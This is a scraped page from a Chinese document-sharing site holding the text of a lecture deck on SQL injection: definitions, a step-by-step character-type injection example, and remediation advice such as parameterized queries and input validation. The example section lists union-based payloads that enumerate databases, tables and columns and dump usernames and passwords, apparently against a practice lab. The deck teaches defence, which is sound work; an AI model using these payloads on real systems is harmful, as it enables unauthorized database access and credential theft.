- 1、本文档共19页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
SQL注入漏洞Software Engineering1、理解SQL注入漏洞的含义2、了解部分SQL漏洞实例3、对SQL漏洞提出修复建议目录SQL注入漏洞的概念01SQL漏洞的具体案例02针对SQL的修复建议031 SQL注入漏洞的概念SQL的注入攻击SQL注入攻击:可以从以下2个角度来理解。定义2.SQL的运行1.SQL注入攻击的种类和作用 SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(如关闭数据库管理系统)、恢复存在于数据库文件系统中的指定文件内容,在某些情况下能对操作系统发布命令。SQL注入攻击是一种注入攻击。它将SQL命令注入到数据层输入,从而影响执行预定义的SQL命令。SQL的注入攻击由于用户的输入,也是SQL语句的一部分,所以攻击者可以利用这部分可以控制的内容,注入自己定义的语句,改变SQL语句执行逻辑,让数据库执行任意自己需要的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何自己需要的数据,利用数据库的一些特性,可以直接获取数据库服务器的系统权限。2 SQL漏洞实例SQL漏洞的具体案例字符型(参数在单引号内,直接返回结果)?SQL漏洞的具体案例步骤1:参数后面加一个单引号报SQL错误 分析:单引号报错,所以参数在两个单引号里面,通过闭合单引号、联合查询直接查询到数据库数据步骤2:构造payload?id=0 union select NULL,database(),NULL --+ ? #查询当前数据库的名称#爆库名id=0 union select null,group_concat(schema_name),null from information_schema.schemata --+#爆表名id=0 union select null,group_concat(table_name),null from information_schema.tables where table_schema=security --+#爆字段名d=0 union select null,group_concat(column_name),null from information_schema.columns where table_schema=security and table_name=users --+#获取数据库中的数据id=0 union select null,group_concat(username,0x3a,password),null from security.users--+3SQL漏洞的修复建议SQL的修复建议第一点使用参数化查询接口或在代码级对带入SQL语句中的外部参数进行转义或过滤修复建议第二点对于整数,判断变量是否符合[0-9]的值;其他限定值,也可以进行合法性校验;对于字符串,对SQL语句特殊字符进行转义(单引号转成两个单引号,双引号转成两个双引号)。SQL的修复建议第三点加强服务器的安全配置,安全组策略修复建议第四点启用制定IP访问数据库的安全限制1、SQL注入漏洞的基本概念2、SQL漏洞的实际案例3、SQL的修复建议大家好,本节课程我们将要学习”SQL注入漏洞”。1、理解SQL注入漏洞的含义2、了解部分SQL漏洞实例3、对SQL漏洞提出修复建议下面正式进入本节课程的学习。首先,我们来学习“SQL注入漏洞的概念“。 SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(如关闭数据库管理系统)、恢复存在于数据库文件系统中的指定文件内容,在某些情况下能对操作系统发布命令。SQL注入攻击是一种注入攻击。它将SQL命令注入到数据层输入,从而影响执行预定义的SQL命令。由于用户的输入,也是SQL语句的一部分,所以攻击者可以利用这部分可以控制的内容,注入自己定义的语句,改变SQL语句执行逻辑,让数据库执行任意自己需要的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何自己需要的数据,利用数据库的一些特性,可以直接获取数据库服务器的系统权限。接下来我们来继续学习SQL漏洞实例此图为字符型注入漏洞步骤1:参数后面加一个单引号报SQL错误 分析:单引号报错,所以参数在两个单引号里面,通过闭合单引号、联合查询直接查询到数据库数据接着利用漏洞查询数据库名称接着把所有的数据库名称给显示出来利用漏洞联合查询表名,准备进一步查表脱库,拿数据联合查询进行字段查询成功获取数据最后我们来学习SQL漏洞的修复建议1.使用参数化查询接口或在代码级
您可能关注的文档
- sp区重要元素及其化合物.pptx
- 二零二三年 优质公开课SQLAlchemy入门.pptx
- SQLAlchemy表关系(一对多).pptx
- SQLAlchemy表关系(多对多).pptx
- 二零二三年 优质公开课SQLAlchemy表外键.pptx
- 二零二三年 优质公开课SQLitespy.pptx
- SQL查询分析导入生成ACCESS数据库文件全国获奖.pptx
- SQL查询分析导入生成ACCESS数据库文件.pptx
- SQL查询分析查询客户地域分布情况.pptx
- SQL查询分析查询客户购买时段情况优秀.pptx
- 文稿题目终极版.pptx
- l cherkashyn设计此卡片模型个人使用于商业用途所用纸张发射工位proxy2k.pdf
- 江苏启创科技图片企业资信.pdf
- 学习目标1chapter 2 lecture with instructors notes12讲师笔记.pdf
- 案例参考介绍mr0605.pdf
- 章期权市场简介2lecture6 chap017讲座.pptx
- 计算流体结构相互作用耦合时间谱方法谐波平衡hbmgt2017-64260.pdf
- 奥美互动团队客户关系管理crm1 vladimir jordanov创意培训.pdf
- 按以下顺序处理规则1验证分配自动响应4 admin flash cardssfdc管理员闪存卡.pdf
- 普通高等学校全国统一考试英语试卷.pdf
文档评论(0)